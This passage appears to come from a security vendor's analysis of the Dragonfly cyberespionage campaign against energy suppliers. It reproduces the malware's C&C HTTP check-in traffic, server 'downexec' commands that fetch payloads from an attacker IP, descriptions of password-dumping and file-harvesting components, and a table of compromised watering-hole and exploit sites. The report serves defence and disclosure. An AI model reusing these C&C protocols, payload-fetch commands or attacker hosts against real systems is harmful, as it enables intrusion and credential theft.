Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Host: microsoft.com
Cookie: MC1=V=3&GUID=<32 character guid>
Connection: Keep-Alive
Cache-control: no-cache
Internet connection test to Adobe using identifiant parameter
POST /geo/productid.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: adobe.com
...
identifiant=51032 _ 175129256364
Example POST request for C&C server check-in
POST /check _ value.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR
2.0.50727)
Host: 93.188.161.235
...
identifiant=51032 _ 1799883375637&version=i2pver
HTTP response example
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2014 05:59:58 GMT
Vary: Accept-Encoding
Content-Length: 324
Content-Type: text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
Via: 1.1 host.alexsieff.com
work:3|downexec [http://]93.188.161.235/check2/muees27jxt/shot.jpg;
work:5|downexec [http://]93.188.161.235/check2/muees27jxt/tl.jpg;
work:7|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
work:103|downexec [http://]93.188.161.235/check2/muees27jxt/pdump.jpg;
work:118|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
15. Page 15
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
The POST data contains the operating system version and a derived number:
• identifiant=[OS VERSION]_[DERIVED NUMBER]
User-Agent tokens used in C&C requests are hard-coded. The following two examples have been observed:
• Mozilla/17.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
Downloaded components
• pdump.jpg - Used for dumping passwords into ProgramDataMailMailAgpwds.txt. Needs ‘vaultcli.dll’ library
• fl.txt - Used for listing RTF, PST, DOC, XLS, PDF, *pass*.*, *secret*.* files into ProgramDataMailMailAgfls.txt
• tl.jpg - Used to list running task using ‘tasklist’ utility
• shot.jpg - Used for desktop screenshot, file is saved into ProgramDataMailMailAgshot.png
Indicators of compromise
Lightsout exploit kit
Watering holes
Table 3. Detected exploit sites hosting the Lightsout exploit kit and referrer
Infected website Infected website
industry
Infected
website
nationality
Exploit site Last Seen
www.s[REDACTED]e.az File hosting service Azerbaijan blog.olioboard.com 18/06/2014 01:19
www.t[REDACTED]e.no Energy control systems Norwegian www.manshur.ir 24/05/2014 10:53
www.s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 22:20
s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 23:30
www.f[REDACTED]y.com Energy American aptguide.3dtour.com 11/04/2014 12:26
www.t[REDACTED]e.no Energy control systems Norwegian seductionservice.com 07/04/2014 06:42
www.a[REDACTED]t.it Energy control systems Italian seductionservice.com 06/04/2014 22:25
www.e[REDACTED]t.it Energy control systems Italian seductionservice.com 05/04/2014 22:57
b[REDACTED]n.in Energy control systems Indian mahsms.ir 23/03/2014 23:01
www.v[REDACTED]z.com Energy French mahsms.ir 21/03/2014 22:30
www.r[REDACTED]e.fr Energy French mahsms.ir 14/03/2014 04:30
www.e[REDACTED]m.eu Energy French aptguide.3dtour.com 04/03/2014 21:27
www.r[REDACTED]e.fr Energy French keeleux.com 30/11/2013 06:57
www.v[REDACTED]z.com Energy French keeleux.com 11/10/2013 12:18